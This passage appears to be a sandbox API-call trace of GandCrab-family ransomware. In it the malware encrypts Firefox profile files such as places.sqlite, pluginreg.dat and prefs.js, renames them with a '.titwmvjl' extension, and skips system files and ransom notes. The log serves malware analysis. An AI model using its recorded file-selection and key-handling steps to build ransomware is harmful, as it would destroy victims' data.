lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="CRAB-DECRYPT.html") returned 1 [0083.162] lstrcmpiW (lpString1="places.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.162] lstrcmpiW (lpString1="places.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.162] lstrcmpiW (lpString1="places.sqlite", lpString2="ntldr") returned 1 [0083.162] lstrcmpiW (lpString1="places.sqlite", lpString2="NTDETECT.COM") returned 1 [0083.162] lstrcmpiW (lpString1="places.sqlite", lpString2="Bootfont.bin") returned 1 [0083.162] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0083.162] lstrlenW (lpString=".sqlite") returned 7 [0083.162] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.162] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0083.162] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.162] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.162] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.163] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.163] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.164] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.164] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.167] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.167] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.167] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.167] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.167] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.167] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.168] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.171] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.171] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.171] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.171] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.171] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.171] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.172] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.174] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503278) returned 1 [0083.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.174] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.175] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.175] GetLastError () returned 0x0 [0083.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.175] CryptDestroyKey (hKey=0x503278) returned 1 [0083.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.175] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.176] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.181] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0083.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.181] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.181] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.182] GetLastError () returned 0x0 [0083.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.182] CryptDestroyKey (hKey=0x503578) returned 1 [0083.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.182] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.182] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.182] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.183] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x100000, lpOverlapped=0x0) returned 1 [0083.228] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.228] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x100000, lpOverlapped=0x0) returned 1 [0083.256] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.256] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.440] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.444] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.447] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.448] CloseHandle (hObject=0x2d4) returned 1 [0083.448] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0083.449] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.449] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.449] lstrcmpW (lpString1="pluginreg.dat", lpString2=".") returned 1 [0083.449] lstrcmpW (lpString1="pluginreg.dat", lpString2="..") returned 1 [0083.449] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat" [0083.449] lstrlenW (lpString=".titwmvjl") returned 9 [0083.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0083.449] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.449] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat.titwmvjl") returned 102 [0083.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0083.449] lstrlenW (lpString=".dat") returned 4 [0083.449] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.449] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".dat ") returned 5 [0083.450] lstrcmpiW (lpString1=".dat", lpString2=".titwmvjl") returned -1 [0083.450] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.450] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0083.450] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="desktop.ini") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="autorun.inf") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="iconcache.db") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="bootsect.bak") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="boot.ini") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat.log") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="thumbs.db") returned -1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="KRAB-DECRYPT.html") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="CRAB-DECRYPT.html") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntldr") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="NTDETECT.COM") returned 1 [0083.450] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Bootfont.bin") returned 1 [0083.450] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0083.450] lstrlenW (lpString=".dat") returned 4 [0083.450] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.450] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".dat ") returned 5 [0083.450] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.451] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.451] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.452] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.452] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.452] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.453] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.455] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.455] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.455] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.455] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.456] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.456] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.456] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.456] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.456] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.459] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.459] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.459] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.459] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.459] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.459] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.459] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.460] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.463] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0083.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.463] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.463] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.464] GetLastError () returned 0x0 [0083.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.464] CryptDestroyKey (hKey=0x503738) returned 1 [0083.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.464] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.464] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.467] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503238) returned 1 [0083.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.467] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.467] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.467] GetLastError () returned 0x0 [0083.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.468] CryptDestroyKey (hKey=0x503238) returned 1 [0083.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.468] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.468] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.468] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.468] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x23b, lpOverlapped=0x0) returned 1 [0083.479] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffdc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.480] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x23b, lpOverlapped=0x0) returned 1 [0083.481] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.481] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.491] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.494] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.494] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.495] CloseHandle (hObject=0x2d4) returned 1 [0083.497] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\pluginreg.dat.titwmvjl"), dwFlags=0x1) returned 1 [0083.498] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.498] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.498] lstrcmpW (lpString1="prefs.js", lpString2=".") returned 1 [0083.498] lstrcmpW (lpString1="prefs.js", lpString2="..") returned 1 [0083.499] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js" [0083.499] lstrlenW (lpString=".titwmvjl") returned 9 [0083.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0083.499] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.499] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js.titwmvjl") returned 97 [0083.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0083.499] lstrlenW (lpString=".js") returned 3 [0083.499] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.499] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".js ") returned 4 [0083.499] lstrcmpiW (lpString1=".js", lpString2=".titwmvjl") returned -1 [0083.499] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0083.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="desktop.ini") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="autorun.inf") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="ntuser.dat") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="iconcache.db") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="bootsect.bak") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="boot.ini") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="ntuser.dat.log") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="thumbs.db") returned -1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="KRAB-DECRYPT.html") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="CRAB-DECRYPT.html") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="ntldr") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="NTDETECT.COM") returned 1 [0083.500] lstrcmpiW (lpString1="prefs.js", lpString2="Bootfont.bin") returned 1 [0083.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0083.500] lstrlenW (lpString=".js") returned 3 [0083.500] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.500] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".js ") returned 4 [0083.500] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.500] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.501] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.501] 